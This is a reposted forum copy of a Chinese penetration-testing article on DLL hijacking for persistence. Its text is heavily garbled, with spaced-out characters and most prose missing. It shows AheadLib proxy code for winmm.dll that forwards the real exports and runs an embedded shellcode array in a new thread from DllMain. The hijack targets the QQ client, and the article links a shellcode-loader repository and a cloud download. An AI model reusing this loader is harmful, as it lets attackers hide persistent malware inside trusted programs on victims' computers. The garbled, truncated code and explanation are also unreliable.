[15641] 2020-07-23_内网渗透研究:dll劫持权限维持

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
2020-07-23_内网渗透研究:dll劫持权限维持 d l l L D r a k u r a   F r e e B u f   2 0 2 0 - 0 7 - 2 3 Q Q 便 便 ~ 0 × 0 1   D L L W i n d o w s P E ( P o r t a b l e   E x e c u t a b l e   F i l e   F o r m a t ) D L L E X E D L L D L L W i n d o w s D L L - > W i n d o w s - > D L L E X E D L L D L L D L L D L L D L L D L L W i n d o w s 7 K n o w n D L L s H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e s s i o n   M a n a g e r K n o w n D L L s D L L E X E S Y S T E M 3 2 0 x 0 2   D L L P r o c c e s s D L L D L L w i n m m . d l l w i n m m . d l l W i n d o w s K n o w n D L L s 使 A h e a d L i b   D L L C D L L
( ) 0 x 0 3   D L L 使 V S 2 0 1 5 2 0 1 x D L L / / / /   c r e a t e d   b y   A h e a d L i b / /   g i t h u b : h t t p s : / / g i t h u b . c o m / s t r i v e x j u n / A h e a d L i b - x 8 6 - x 6 4 / / # i n c l u d e   < w i n d o w s . h > # i n c l u d e   < S h l w a p i . h > # p r a g m a   c o m m e n t (   l i b ,   " S h l w a p i . l i b " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : N o n a m e 2 = _ A h e a d L i b _ U n n a m e d 2 , @ 2 , N O N A M E " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m c i E x e c u t e = _ A h e a d L i b _ m c i E x e c u t e , @ 3 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : C l o s e D r i v e r = _ A h e a d L i b _ C l o s e D r i v e r , @ 4 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : D e f D r i v e r P r o c = _ A h e a d L i b _ D e f D r i v e r P r o c , @ 5 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t C a c h e P a t c h e s = _ A h e a d L i b _ m i d i O u t C a c h e P a t c h e s , @ 7 5 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t C l o s e = _ A h e a d L i b _ m i d i O u t C l o s e , @ 7 6 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t D e v C a p s A = _ A h e a d L i b _ m i d i O u t G e t D e v C a p s A , @ 7 7 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t D e v C a p s W = _ A h e a d L i b _ m i d i O u t G e t D e v C a p s W , @ 7 8 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t E r r o r T e x t A = _ A h e a d L i b _ m i d i O u t G e t E r r o r T e x t A , @ 7 9 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t E r r o r T e x t W = _ A h e a d L i b _ m i d i O u t G e t E r r o r T e x t W , @ 8 0 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t I D = _ A h e a d L i b _ m i d i O u t G e t I D , @ 8 1 " ) . . . . . . . . . # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t N u m D e v s = _ A h e a d L i b _ m i d i O u t G e t N u m D e v s , @ 8 2 " ) # p r a g m a   c o m m e n t ( l i n k e r ,   " / E X P O R T : m i d i O u t G e t V o l u m e = _ A h e a d L i b _ m i d i O u t G e t V o l u m e , @ 8 3 " ) # p r a g m a . . . . . . . . . P V O I D   p f n A h e a d L i b _ w a v e O u t P a u s e ; P V O I D   p f n A h e a d L i b _ w a v e O u t P r e p a r e H e a d e r ; P V O I D   p f n A h e a d L i b _ w a v e O u t R e s e t ; P V O I D   p f n A h e a d L i b _ w a v e O u t R e s t a r t ; P V O I D   p f n A h e a d L i b _ w a v e O u t S e t P i t c h ; P V O I D   p f n A h e a d L i b _ w a v e O u t S e t P l a y b a c k R a t e ; P V O I D   p f n A h e a d L i b _ w a v e O u t S e t V o l u m e ; P V O I D   p f n A h e a d L i b _ w a v e O u t U n p r e p a r e H e a d e r ; P V O I D   p f n A h e a d L i b _ w a v e O u t W r i t e ; P V O I D   p f n A h e a d L i b _ w i d 3 2 M e s s a g e ; P V O I D   p f n A h e a d L i b _ w o d 3 2 M e s s a g e ; s t a t i c H M O D U L E   g _ O l d M o d u l e   =       . . .     . . .     p f n A h e a d L i b _ w a v e O u t G e t V o l u m e   =   G e t A d d r e s s ( " w a v e O u t G e t V o l u m e " ) ;     p f n A h e a d L i b _ w a v e O u t M e s s a g e   =   G e t A d d r e s s ( " w a v e O u t M e s s a g e " ) ;     p f n A h e a d L i b _ w a v e O u t O p e n   =   G e t A d d r e s s ( " w a v e O u t O p e n " . . . . . . E X T E R N _ C   _ _ d e c l s p e c ( n a k e d )   v o i d   _ _ c d e c l   A h e a d L i b _ w o d 3 2 M e s s a g e ( v o i d ) {     _ _ a s m   j m p   p f n A h e a d L i b _ w o d 3 2 M e s s a g e ; }
d l l m a i n . c p p w i n m m _ f b . c p p D l l M a i n D L L D l l M a i n ( ) 线 u n s i g n e d   c h a r   s h e l l c o d e [ ]   = " x b f x 6 e x 4 a x 2 5 x 0 8 x d 9 x e b x d 9 x 7 4 x 2 4 x f 4 x 5 d x 3 3 x c 9 x b 1 " " x 3 1 x 3 1 x 7 d x 1 3 x 0 3 x 7 d x 1 3 x 8 3 x c 5 x 6 a x a 8 x d 0 x f 4 x 9 a x a e " " x 1 b x 0 5 x 5 a x c f x 9 2 x e 0 x 6 b x c f x c 1 x 6 1 x d b x f f x 8 2 x 2 4 x d 7 " H A N D L E   h T h r e a d 1   =   C r e a t e T h r e a d ( N U L L ,   0 ,   r u n ,   N U L L ,   0 ,   N U L L ) ;
0 x 0 4   D L L D L L w i n m m . d l l Q Q e x e Q Q : Q Q ~ ~ s h e l l c o d e 线 s h e l l c o d e s h l l c o d e s h e l l c o d e 0 x 0 5   : D L L h i j a c k - S h e l l c o d e L o a d e r : h t t p s : / / g i t h u b . c o m / L D r a k u r a / D L L h i j a c k - S h e l l c o d e L o a d e r :   h t t p s : / / p a n . b a i d u . c o m / s / 1 4 9 P B c Z 5 O m S A 5 C l t 8 L P l Z f g   :   j 8 t x A h e a d L i b : h t t p s : / / g i t h u b . c o m / s t r i v e x j u n / A h e a d L i b - x 8 6 - x 6 4

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则